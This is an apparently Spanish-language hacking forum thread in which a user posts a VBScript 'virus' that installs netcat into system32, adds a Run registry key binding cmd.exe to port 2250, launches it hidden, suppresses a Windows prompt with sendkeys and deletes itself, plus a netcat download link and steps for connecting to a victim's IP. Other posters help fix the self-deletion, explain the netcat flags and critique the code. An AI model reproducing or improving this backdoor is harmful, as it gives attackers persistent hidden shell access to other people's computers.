[Mi virus para entrar en otro ordenador][vbs]¿fallos?

dvd3000 · 17 Septiembre 2009, 20:25 PM

Bueno este es mi virus (no sé si se dice troyano, gusano ,o como sea a un programita para entrar en otro ordenador)

Seguramente existen otras muchas formas, pero ami se me ha ocurrido esta:
se compone de dos partes, una son los archivos distribuidos a la victima,
la otra son los del hacker que quiere entrar.

1-parte
son dos archivos, uno de ellos es el nc.exe con nombre de Modo Consola.exe
y el otro es un vbs:

Código [Seleccionar]

On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"			
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre

se supone que se tiene que autoborrar...

el nc.exe lo podeis descargar aquí:
http://ares.hotshare.net/download/wqeRcXDFHgDF/wqIUSaopopHgIUwqwqNM/9324929be1/96241/nc.exe

le cambiais el nombre a Modo Consola.exe

la otra parte, me la ahorro (solo son archivos que automatizan la entrada),
copiais el nc en c:\windows\system32 (con nombre nc.exe).
para entrar en el otro ordenador entrais en la consola de comandos y escribis:
nc.exe IP 2250
en IP poneis la ip del ordenador al que quereis entrar.
y entrareis en la consola de comandos del otro ordenador donde podeis modificar cualquier cosa.

Aver si me ayudais con el vbs, tengo un par de problemas por ahora que no sé solucionar:
1-No se autoborra
2-al ejecutarlo en otro ordenador sale el mensaje de windows de que se va a ejecutar un archivo, creo haberlo solucionado con el sendkeys...

Novlucker · 19 Septiembre 2009, 01:39 AM

Citar1-No se autoborra

Intenta con ..

Código (vb) [Seleccionar]

objfso.deletefile wscript.scriptfullname

Citar2-al ejecutarlo en otro ordenador sale el mensaje de windows de que se va a ejecutar un archivo, creo haberlo solucionado con el sendkeys...

En que sistema operativo lo estas ejecutando?

Lo has hecho tu o es copy/paste de varios sitios, entiendes lo que estas haciendo?

CitarOn Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre

Que hace todo eso repetido?
Los objetos con que los declares una sola vez alcanza, con tener un solo objfso y un solo objshell es más que suficiente

Saludos

dvd3000 · 20 Septiembre 2009, 18:00 PM

sé lo que hago, están repetidos porque tengo un montón de plantillas y si, las voy copiando.
lo ejecuto en windows xp
¿pasa algo si se repiten?, si va mas lento lo cambio ahora mismo

objfso.deletefile wscript.scriptfullname
Yo había puesto solo Scriptname, parece que funciona.
gracias.

Novlucker · 20 Septiembre 2009, 19:41 PM

En realidad si .. declaras varias veces un objeto en memoria, la perdida de rendimiento practicamente no se ve, pero existe

Saludos

markus_bitman · 25 Enero 2010, 00:46 AM

CitarOn Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre

Disculpen muchachos, sera que me pueden decir donde obtengo informacion acerca de esta linea de programacion: correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide parece que significa ejecutar el archivo de manera oculta pero quisiera entender el porque -L -p 2250? son comandos NetCat? -e? que es eso?

Saludos

Novlucker · 25 Enero 2010, 00:48 AM

Exacto, ejecuta el comando de manera oculta, y todo lo que esta entre comillas es lo que se va a ejecutar, por lo que las opciones que comentas son parámetros del netcat

Saludos

[L]ord [R]NA · 25 Enero 2010, 17:04 PM

Con esa ultima pregunta que el hace verdaderamente se ve que copio el codigo de algun lugar

1) Las que estan en Azul las declara 3 veces, pudiendo hacer todo lo que hizo con una sola.
2) CreateObject("Scripting.FileSystemObject") es declarado 4 veces de los cuales solo utiliza 2.

verdaderamente si tu fuiste que lo hiciste deberias de reorientarte y aprender a programar antes de empezar a hacer esto, ademas por definicion esto no entra en una definicion de virus, entraria en backdoorear un ordenador con netcat, una herramienta detectada como una HackingTool por muchas empresas antivirus.